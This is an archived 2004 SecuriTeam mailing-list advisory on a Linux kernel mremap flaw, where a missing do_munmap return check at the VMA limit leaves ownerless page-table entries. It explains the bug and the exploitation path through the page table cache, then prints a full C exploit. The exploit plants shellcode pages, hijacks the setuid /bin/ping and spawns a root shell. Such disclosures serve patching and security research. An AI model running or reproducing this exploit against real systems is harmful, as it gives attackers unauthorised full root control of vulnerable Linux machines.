[UNIX] Linux Kernel do_mremap VMA Limit Local Privilege Escalation (Technical Details)

From: SecuriTeam (support_at_securiteam.com)
Date: 03/02/04

  • Next message: SecuriTeam: "[NEWS] XSS Bug in NetScreen-SA 5000 Series of SSL VPN Appliance (delhomepage.cgi)"
    To: list@securiteam.com
    Date: 2 Mar 2004 19:11:00 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Linux Kernel do_mremap VMA Limit Local Privilege Escalation (Technical
    Details)
    ------------------------------------------------------------------------

    SUMMARY

    A critical security vulnerability has been found in the Linux kernel
    memory management code inside the mremap(2) system call due to missing
    function return value check. This bug is completely unrelated to the
    mremap bug disclosed on 05-01-2004 except concerning the same internal
    kernel function code.

    DETAILS

    Vulnerable Systems:
     * Linux version 2.2 up to and including 2.2.25
     * Linux version 2.4 up to to and including 2.4.24
     * Linux version 2.6 up to to and including 2.6.2

    The Linux kernel manages a list of user addressable valid memory locations
    on a per process basis. Every process owns a single linked list of so
    called virtual memory area descriptors (called from now on just VMAs).
    Every VMA describes the start of a valid memory region, its length and
    moreover various memory flags like page protection.

    Every VMA in the list corresponds to a part of the process's page table.
    The page table contains descriptors (in short page table entries PTEs) of
    physical memory pages seen by the process. The VMA descriptor can be thus
    understood as a high level description of a particular region of the
    process's page table storing PTE properties like page R/W flag and so on.

    The mremap() system call provides resizing (shrinking or growing) as well
    as moving of existing virtual memory areas or any of its parts across
    process's addressable space.

    Moving a part of the virtual memory from inside a VMA area to a new
    location requires creation of a new VMA descriptor as well as copying the
    underlying page table entries described by the VMA from the old to the new
    location in the process's page table.

    To accomplish this task the do_mremap code calls the do_munmap() internal
    kernel function to remove any potentially existing old memory mapping in
    the new location as well as to remove the old virtual memory mapping.
    Unfortunately the code doesn't test the return value of the do_munmap()
    function which may fail if the maximum number of available VMA descriptors
    has been exceeded. This happens if one tries to unmap middle part of an
    existing memory mapping and the process's limit on the number of VMAs has
    been reached (which is currently 65535).

    One of the possible situations can be illustrated with the following
    picture. The corresponding page table entries (PTEs) have been marked with
    o and x:

    Before mremap():

    (oooooooooooooooooooooooo) (xxxxxxxxxxxx)
    [----------VMA1----------] [----VMA2----]
          [REMAPPED-VMA] <---------------|

    After mremap() without VMA limit:

    (oooo)(xxxxxxxxxxxx)(oooo)
    [VMA3][REMAPPED-VMA][VMA4]

    After mremap() but VMA limit:
    (ooooxxxxxxxxxxxxxxoooo)
    [---------VMA1---------]
         [REMAPPED-VMA]

    After the maximum number of VMAs in the process's VMA list has been
    reached do_munmap() will refuse to create the necessary VMA hole because
    it would split the original VMA in two disjoint VMA areas exceeding the
    VMA descriptor limit.

    Due to the missing return value check after trying to unmap the middle of
    the VMA1 (this is the first invocation of do_munmap inside do_mremap code)
    the corresponding page table entries from VMA2 are still inserted into the
    page table location described by VMA1 thus being subject to VMA1 page
    protection flags. It must be also mentioned that the original PTEs in the
    VMA1 are lost thus leaving the corresponding page frames unusable for
    ever.

    The kernel also tries to insert the overlapping VMA area into the VMA
    descriptor list but this fails due to further checks in the low level VMA
    manipulation code. The low level VMA list check in the 2.4 and 2.6 kernel
    versions just call BUG() therefore terminating the malicious process.

    There are also two other unchecked calls to do_munmap() inside the
    do_mremap() code and we believe that the second occurrence of unchecked
    do_munmap is also exploitable. The second occurrence takes place if the
    VMA to be remapped is
    beefing truncated in place. Note that do_munmap can also fail on an
    exceptional low memory condition while trying to allocate a VMA
    descriptor.

    Exploitation:
    The vulnerability turned out to be very easily exploitable. Our first
    guess was to move PTEs from one VMA mapping a read-only file (like
    /etc/passwd) to another writeable VMA. This approach failed because after
    the BUG() macro has been invoked the mmap semaphore of the memory
    descriptor is left in a closed (that is down_write()) state thus
    preventing any further memory operations which acquire the semaphore in
    other clone threads.

    So our attention came over the page table cache code which was introduced
    early in the 2.4 series but not enabled by default. Kernels later than the
    2.4.19 enable the page table cache. The basic idea of a page table cache
    is to keep free page frames recently used for the page tables in a linked
    list to speed up the allocation of new page tables.

    On Linux every process owns a reference to a memory descriptor (mm_struct)
    which contains a pointer to a page directory. The page directory is a
    single page frame (we describe the 4kb sized pages case without PAE)
    containing 1024 pointers to the page tables. A single page table page on
    the i386 architecture holds 1024 PTEs describing up to 4MB of process's
    virtual memory. A single PTE contains the physical address of the page
    mapped at the PTE's virtual address and the page access rights.

    The page tables are allocated on demand if a page fault occurs. They are
    also freed and the corresponding page frames released to the memory
    manager if a process unmaps parts of its virtual memory spanning at least
    one page table page that is a region containing at least a 4MB sized and
    4MB aligned memory area.

    There are two paths if a new page table must be allocated: the slow and
    the fast one. The fast path takes one page from the head of the page table
    cache while the slow one just calls get_free_page(). This works well if
    the pages from the page table cache have been properly cleared before
    inserting them into the cache. Normally the page tables are cleared by
    zap_page_range() which is called from do_munmap. It is very important for
    the proper operation of the Linux memory management that all locations of
    the process's page table actually containing a valid PTE are covered by
    the corresponding VMA descriptor.

    In the case of the unchecked do_munmap inside the mremap code we have
    found a condition leaving a part of the page table uncovered by a VMA. The
    offending code is:

    [269] if (old_len >= new_len) {
      do_munmap(current->mm, addr+new_len, old_len - new_len);
      if (!(flags & MREMAP_FIXED) || (new_addr == addr))
       goto out;
     }

    This piece of code is responsible for truncating the VMA the user wants to
    remap in place. It can be easily seen that do_munmap will fail if
    [addr+new_len, addr+new_len + (old_len-new_len)] goes into the middle of a
    VMA and the maximum number of allowed VMA descriptors has been already
    used by the process. That means also that the page table will still
    contain valid PTEs from addr+new_len on. Later in the mremap code a part
    of the corresponding VMA is moved and truncated:

    [179] if (!move_page_tables(current->mm, new_addr, addr, old_len)) {
      unsigned long vm_locked = vma->vm_flags & VM_LOCKED;

      if (allocated_vma) {
       *new_vma = *vma;
       new_vma->vm_start = new_addr;
       new_vma->vm_end = new_addr+new_len;
       new_vma->vm_pgoff += (addr-vma->vm_start) >> PAGE_SHIFT;

    but more PTEs (namely old_len) than the length of the created VMA are
    moved from the old location if a new location has been specified along
    with the MREMAP_MAYMOVE flag. This works well only if the previous
    do_munmap did not fail. This situation can be illustrated as follows:

    before mremap:

           <-- old_len -->
    (oooooooooooooooooooooooooooo)
    [------|-----VMA1-----|------]
                |---------------------------------> new_addr

    after mremap, no VMA limit:
          new_len
    (oooooo) (oooooo) (oooooo)
    [-VMA1-] [-VMA3-] [-VMA2-]

    after mremap but VMA limit:
          new_len [*]
    (oooooo oooooo) (oooooo)ooooooooo
    [-----------VMA1-------------] [-VMA2-]

    Those [*] 'ownerless' PTE entries in the page table can be further
    exploited since the memory manager has lost track of them. If the process
    now unmaps a sufficiently big area of memory covering those ownerless
    PTEs, the underlying page table frame will be inserted into the page table
    cache but will still contain valid PTEs. That means that on the next page
    table frame allocation inside process P for an address A our PTEs will
    appear in the page table of the process P! If that process tries to access
    the virtual memory at the address A there won't be also a page fault if
    the PTEs have appropriate (read or write) access rights. In other words:
    through the page table cache we are able to insert any data into the
    virtual memory space of another process.

    Our code takes the way through a setuid binary, however this is not the
    only one possibility. We prepare the page table cache so that there is a
    single empty page frame in front of the cache and then a special page
    table containing 'self executing' pages. To fully understand how it works
    we must dig into the execve() system call.

    If an user calls execve() the kernel removes all traces of the current
    executable including the virtual memory areas and page tables allocated to
    the process. Then a new VMA for the stack on top of the virtual memory is
    created where the program environment and arguments to the new binary are
    stored (they have been preserved in kernel memory). This causes a first
    page table frame to be allocated for the virtual memory region ranging
    from 0xbfc00000-0xc0000000.

    As next the .text and .data sections of the binary to be executed as well
    as the program interpreter responsible for further loading are mapped into
    the fresh virtual memory space. For the ELF linking format this is usually
    the ld.so dynamic linker. At this point the kernel does not allocate the
    underlying page tables. Only VMA descriptors are inserted into the
    process's VMA list.

    After doing some more work not important for the following the kernel
    transfers control to the dynamic linker to execute the binary. This causes
    a second page fault and triggers demand loading of the first code page of
    the dynamic linker. On a standard Linux kernel this will also allocate a
    page frame for the page table ranging from 0x40000000 to 0x40400000.

    On a kernel with page table cache enabled both allocations will take page
    frames from the cache first. That means that if the second page in the
    cached page list contains valid PTEs those could appear instead of the
    regular dynamic linker code. It is easy to place the PTEs so that they
    will shadow the code section of the dynamic linker. Note that the first
    PTE entry of a page is used by the cache code to maintain the page list.
    In our code we populate the page table cache with special frames
    containing PTEs to pages with a short shell code at the end of the page
    and fill the pages with a NOP landing zone.

    We must also mention that the first mremap hole disclosed on 05-01-2004
    can be also very easily exploited through the page table cache. Details
    are left for the skilled reader.

    A second possibility to exploit the mremap bug is to create another VMA
    covering ownerless PTEs from a read-only file like /etc/passwd.

    Impact:
    Since no special privileges are required to use the mremap(2) system call
    any process may use its unexpected behavior to disrupt the kernel memory
    management subsystem.

    Proper exploitation of this vulnerability leads to local privilege
    escalation giving an attacker full super-user privileges. The
    vulnerability may also lead to a denial-of-service attack on the available
    system memory.

    Tested and known to be vulnerable kernel versions are all <= 2.2.25, <=
    2.4.24 and <= 2.6.2. The 2.2.25 version of Linux kernel does not recognize
    the MREMAP_FIXED flag but this does not prevent the bug from being
    successfully exploited. All users are encouraged to patch all vulnerable
    systems as soon as appropriate vendor patches are released. There is no
    hotfix for this vulnerability. Limited per user virtual memory still
    permits do_munmap() to fail.

    Exploit:
    /*
     *
     * mremap missing do_munmap return check kernel exploit
     *
     * gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte
     * ./mremap_pte [suid] [[shell]]
     *
     * Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
     *
     * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
     * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
     * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
     *
     */

    #include <stdio.h>
    #include <stdlib.h>
    #include <errno.h>
    #include <unistd.h>
    #include <syscall.h>
    #include <signal.h>
    #include <time.h>
    #include <sched.h>

    #include <sys/mman.h>
    #include <sys/wait.h>
    #include <sys/utsname.h>

    #include <asm/page.h>

    #define str(s) #s
    #define xstr(s) str(s)

    // this is for standard kernels with 3/1 split
    #define STARTADDR 0x40000000
    #define PGD_SIZE (PAGE_SIZE * 1024)
    #define VICTIM (STARTADDR + PGD_SIZE)
    #define MMAP_BASE (STARTADDR + 3*PGD_SIZE)

    #define DSIGNAL SIGCHLD
    #define CLONEFL (DSIGNAL|CLONE_VFORK|CLONE_VM)

    #define MREMAP_MAYMOVE ( (1UL) << 0 )
    #define MREMAP_FIXED ( (1UL) << 1 )

    #define __NR_sys_mremap __NR_mremap

    // how many ld.so pages? this is the .text section length (like from cat
    // /proc/self/maps) in pages
    #define LINKERPAGES 0x14

    // suid victim
    static char *suid="/bin/ping";

    // shell to start
    static char *launch="/bin/bash";

    _syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d,
       ulong, e);
    unsigned long sys_mremap(unsigned long addr, unsigned long old_len,
        unsigned long new_len, unsigned long flags,
        unsigned long new_addr);

    static volatile unsigned base, *t, cnt, old_esp, prot, victim=0;
    static int i, pid=0;
    static char *env[2], *argv[2];
    static ulong ret;

    // code to appear inside the suid image
    static void suid_code(void)
    {
    __asm__(
     " call callme \n"

    // setresuid(0, 0, 0), setresgid(0, 0, 0)
     "jumpme: xorl %ebx, %ebx \n"
     " xorl %ecx, %ecx \n"
     " xorl %edx, %edx \n"
     " xorl %eax, %eax \n"
     " mov $"xstr(__NR_setresuid)", %al \n"
     " int $0x80 \n"
     " mov $"xstr(__NR_setresgid)", %al \n"
     " int $0x80 \n"

    // execve(launch)
     " popl %ebx \n"
     " andl $0xfffff000, %ebx \n"
     " xorl %eax, %eax \n"
     " pushl %eax \n"
     " movl %esp, %edx \n"
     " pushl %ebx \n"
     " movl %esp, %ecx \n"
     " mov $"xstr(__NR_execve)", %al \n"
     " int $0x80 \n"

    // exit
     " xorl %eax, %eax \n"
     " mov $"xstr(__NR_exit)", %al \n"
     " int $0x80 \n"

     "callme: jmp jumpme \n"
     );
    }

    static int suid_code_end(int v)
    {
    return v+1;
    }

    static inline void get_esp(void)
    {
    __asm__(
     " movl %%esp, %%eax \n"
     " andl $0xfffff000, %%eax \n"
     " movl %%eax, %0 \n"
     : : "m"(old_esp)
     );
    }

    static inline void cloneme(void)
    {
    __asm__(
     " pusha \n"
     " movl $("xstr(CLONEFL)"), %%ebx \n"
     " movl %%esp, %%ecx \n"
     " movl $"xstr(__NR_clone)", %%eax \n"
     " int $0x80 \n"
     " movl %%eax, %0 \n"
     " popa \n"
     : : "m"(pid)
     );
    }

    static inline void my_execve(void)
    {
    __asm__(
     " movl %1, %%ebx \n"
     " movl %2, %%ecx \n"
     " movl %3, %%edx \n"
     " movl $"xstr(__NR_execve)", %%eax \n"
     " int $0x80 \n"
     : "=a"(ret)
     : "m"(suid), "m"(argv), "m"(env)
     );
    }

    static inline void pte_populate(unsigned addr)
    {
    unsigned r;
    char *ptr;

     memset((void*)addr, 0x90, PAGE_SIZE);
     r = ((unsigned)suid_code_end) - ((unsigned)suid_code);
     ptr = (void*) (addr + PAGE_SIZE);
     ptr -= r+1;
     memcpy(ptr, suid_code, r);
     memcpy((void*)addr, launch, strlen(launch)+1);
    }

    // hit VMA limit & populate PTEs
    static void exhaust(void)
    {
    // mmap PTE donor
     t = mmap((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ|PROT_WRITE,
        MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
     if(MAP_FAILED==t)
      goto failed;

    // prepare shell code pages
     for(i=2; i<LINKERPAGES+1; i++)
      pte_populate(victim + PAGE_SIZE*i);
     i = mprotect((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ);
     if(i)
      goto failed;

    // lock unmap
     base = MMAP_BASE;
     cnt = 0;
     prot = PROT_READ;
     printf("\n"); fflush(stdout);
     for(;;) {
      t = mmap((void*)base, PAGE_SIZE, prot,
        MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
      if(MAP_FAILED==t) {
       if(ENOMEM==errno)
        break;
       else
        goto failed;
      }
      if( !(cnt%512) || cnt>65520 )
       printf("\r MMAP #%d 0x%.8x - 0x%.8lx", cnt, base,
       base+PAGE_SIZE); fflush(stdout);
      base += PAGE_SIZE;
      prot ^= PROT_EXEC;
      cnt++;
     }

    // move PTEs & populate page table cache
     ret = sys_mremap(victim+PAGE_SIZE, LINKERPAGES*PAGE_SIZE, PAGE_SIZE,
        MREMAP_FIXED|MREMAP_MAYMOVE, VICTIM);
     if(-1==ret)
      goto failed;

     munmap((void*)MMAP_BASE, old_esp-MMAP_BASE);
     t = mmap((void*)(old_esp-PGD_SIZE-PAGE_SIZE), PAGE_SIZE,
       PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0,
       0);
     if(MAP_FAILED==t)
      goto failed;

     *t = *((unsigned *)old_esp);
     munmap((void*)VICTIM-PAGE_SIZE, old_esp-(VICTIM-PAGE_SIZE));
     printf("\n[+] Success\n\n"); fflush(stdout);
     return;

    failed:
     printf("\n[-] Failed\n"); fflush(stdout);
     _exit(0);
    }

    static inline void check_kver(void)
    {
    static struct utsname un;
    int a=0, b=0, c=0, v=0, e=0, n;

     uname(&un);
     n=sscanf(un.release, "%d.%d.%d", &a, &b, &c);
     if(n!=3 || a!=2) {
      printf("\n[-] invalid kernel version string\n");
      _exit(0);
     }

     if(b==2) {
      if(c<=25)
       v=1;
     }
     else if(b==3) {
      if(c<=99)
       v=1;
     }
     else if(b==4) {
      if(c>18 && c<=24)
       v=1, e=1;
      else if(c>24)
       v=0, e=0;
      else
       v=1, e=0;
     }
     else if(b==5 && c<=75)
      v=1, e=1;
     else if(b==6 && c<=2)
      v=1, e=1;

     printf("\n[+] kernel %s vulnerable: %s exploitable %s",
      un.release, v? "YES" : "NO", e? "YES" : "NO" );
     fflush(stdout);

     if(v && e)
      return;
     _exit(0);
    }

    int main(int ac, char **av)
    {
    // prepare
     check_kver();
     memset(env, 0, sizeof(env));
     memset(argv, 0, sizeof(argv));
     if(ac>1) suid=av[1];
     if(ac>2) launch=av[2];
     argv[0] = suid;
     get_esp();

    // mmap & clone & execve
     exhaust();
     cloneme();
     if(!pid) {
      my_execve();
     } else {
      waitpid(pid, 0, 0);
     }

    return 0;
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:ihaquer@isec.pl> Paul
    Starzetz.

    The original article can be found at:
    <http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt>
    http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NEWS] XSS Bug in NetScreen-SA 5000 Series of SSL VPN Appliance (delhomepage.cgi)"

    Relevant Pages

    • Kernel Vulnerability
      ... Linux kernel do_mremap VMA limit local privilege escalation ... A critical security vulnerability has been found in the Linux kernel memory ... The corresponding page table entries (PTEs) have been marked with o and x: ...
      (comp.os.linux.security)
    • mremap(2) full details available
      ... Linux kernel do_mremap VMA limit local privilege escalation ... A critical security vulnerability has been found in the Linux kernel memory ... The corresponding page table entries (PTEs) have been marked with o and x: ...
      (Bugtraq)
    • Kernel Vulnerability
      ... Linux kernel do_mremap VMA limit local privilege escalation ... A critical security vulnerability has been found in the Linux kernel memory ... The corresponding page table entries (PTEs) have been marked with o and x: ...
      (comp.os.linux.security)
    • [Full-Disclosure] Re: Second critical mremap() bug found in all Linux kernels
      ... > A critical security vulnerability has been found in the Linux kernel ... > memory management code inside the mremapsystem call due to missing ... > Every VMA in the list corresponds to a part of the process's page table. ...
      (Full-Disclosure)
    • Re: Second critical mremap() bug found in all Linux kernels
      ... > A critical security vulnerability has been found in the Linux kernel ... > memory management code inside the mremapsystem call due to missing ... > Every VMA in the list corresponds to a part of the process's page table. ...
      (Full-Disclosure)

  • Quantcast